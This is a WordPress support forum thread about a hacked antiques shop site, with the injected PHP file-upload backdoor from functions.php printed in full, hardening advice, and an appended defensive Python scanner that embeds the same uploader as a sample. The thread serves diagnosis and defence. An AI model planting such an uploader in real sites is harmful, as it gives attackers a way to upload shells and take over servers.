• Last week my website developed a problem and can anyone suggest how to fix it? The website is https://www.tamarackshackantiques.com and has a spot to upload a file for some reason at the top of the page. It randomly appeared and is on both the actual site and the admin part. I also can’t change or upload photos to the site or to the products. Any suggestions on how to fix this?

Viewing 5 replies - 1 through 5 (of 5 total)
  • Moderator Steven Stern (sterndata)

    (@sterndata)

    Volunteer Forum Moderator

    According to Sucuri, your site is not serving malware. Before we fly the “hacked” flag, let’s do a few checks:

    1. Install Wordfence and perform a scan of the site, including themes, plugins, and core files.

    2. If that shows up as clean, this may be a plugin or theme issue. Please attempt to disable all plugins, and use one of the default (Twenty*) themes. If the problem goes away, enable them one by one to identify the source of your troubles.

    Thread Starter tamarackshack

    (@tamarackshack)

    Thank you for your help. I do believe that the site was hacked and I figured out that they added this to my functions.php on my child theme:

    <?php
    if(isset($_POST[‘Submit’])){
    $filedir = “”;
    $maxfile = ‘2000000’;

    $userfile_name = $_FILES[‘image’][‘name’];
    $userfile_tmp = $_FILES[‘image’][‘tmp_name’];
    if (isset($_FILES[‘image’][‘name’])) {
    $abod = $filedir.$userfile_name;
    @move_uploaded_file($userfile_tmp, $abod);

    echo”<center><b>Done ==> $userfile_name</b></center>”;
    }
    }
    else{
    echo’
    <form method=”POST” action=”” enctype=”multipart/form-data”><input type=”file” name=”image”><input type=”Submit” name=”Submit” value=”Submit”></form>’;
    }
    ?>

    That’s definitely the result of malicious action and there’s a very high chance that it was done through a WordPress admin compromise. Once they have your admin login, they want to upload files to increase their access privileges. This is done by uploading PHP shell files and can be done through the two most common methods AFTER they have the admin login:

    1) Utilize the built-in theme editor to modify the source coding of your theme (this is what was likely used in your case)

    2) Utilize the plugin uploader to upload a fake plugin that actually contains their PHP shells or other malware to increase access privileges for themselves

    It looks like your login was compromised and the theme editor was used to inject malicious coding into the functions.php theme file; to be more specific, it was coding for a file uploader so they could use it to gain further access. It looks like an amateur job.

    If you don’t have a recent clean backup that you can restore from, then I would recommend contacting a specialist to handle this for you unless you are familiar with hosting environments. After cleaning, you will want to start by hardening your WP environment. By far the best two things would be the following:

    – Disable theme editor through wp-config.php

    – Implement two-factor authentication for wp-admin

    P.S. If you are hosting multiple domains under a single user then they are also probably infected, or will be soon, through cross site contamination.

    • This reply was modified 8 years, 4 months ago by g0tr00t. Reason: Forgot to mention cross-site contamination
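
A read-only triage check for the situation described in the reply above, as an added example that is not part of the original thread: it flags theme PHP files that combine `move_uploaded_file` with `$_FILES` or emit a file-upload form, and reports whether `wp-config.php` sets WordPress's `DISALLOW_FILE_EDIT` constant. The function names, directory layout and sample files are constructed for illustration, and a hit is a lead for manual review, not proof of compromise.

```python
import re
import tempfile
from pathlib import Path

# Heuristics drawn from the snippet quoted in this thread: an upload handler
# (move_uploaded_file fed from $_FILES) and a bare file-upload form in a theme file.
UPLOAD_SINK = re.compile(r"move_uploaded_file\s*\(", re.I)
FILES_SOURCE = re.compile(r"\$_FILES\s*\[")
FILE_INPUT = re.compile(r"<input[^>]+type\s*=\s*[\"']?file", re.I)
# WordPress constant that switches off the built-in theme/plugin editor.
NO_EDITOR = re.compile(r"define\s*\(\s*['\"]DISALLOW_FILE_EDIT['\"]\s*,\s*true\s*\)", re.I)

def scan_php(text):
    """Return the indicator names found in one PHP source string."""
    hits = []
    if UPLOAD_SINK.search(text) and FILES_SOURCE.search(text):
        hits.append("upload-handler")
    if FILE_INPUT.search(text):
        hits.append("file-input-form")
    return hits

def audit_site(wp_root):
    """Scan wp-content/themes and report (suspicious files, editor disabled?)."""
    root = Path(wp_root)
    findings = {}
    for php in sorted((root / "wp-content" / "themes").rglob("*.php")):
        hits = scan_php(php.read_text(errors="replace"))
        if hits:
            findings[php.relative_to(root).as_posix()] = hits
    config = root / "wp-config.php"
    editor_disabled = config.is_file() and bool(NO_EDITOR.search(config.read_text(errors="replace")))
    return findings, editor_disabled

def build_sample_site(base):
    """Constructed sample tree: one clean theme file, one with an injected uploader."""
    theme = Path(base) / "wp-content" / "themes" / "child"
    theme.mkdir(parents=True)
    (theme / "header.php").write_text("<?php wp_head(); ?>\n")
    (theme / "functions.php").write_text(
        "<?php if (isset($_POST['Submit'])) {\n"
        "  @move_uploaded_file($_FILES['image']['tmp_name'], $_FILES['image']['name']);\n"
        "} else { echo '<form method=\"POST\" enctype=\"multipart/form-data\">"
        "<input type=\"file\" name=\"image\"></form>'; } ?>\n")
    (Path(base) / "wp-config.php").write_text("<?php define('DB_NAME', 'wp');\n")
    return base

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        print(audit_site(build_sample_site(tmp)))
```

Point `audit_site` at a copy of the site's document root; comparing flagged files against a fresh download of the same theme version shows which lines were injected.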
    Moderator Steven Stern (sterndata)

    (@sterndata)

    Volunteer Forum Moderator

    Remain calm and carefully follow this guide. When you’re done, you may want to implement some (if not all) of the recommended security measures.

    Thank you very much, I encountered the exact same thing and you’ve saved me a crapload of time looking for solutions. Thank you.

  • The topic ‘Random upload form’ is closed to new replies.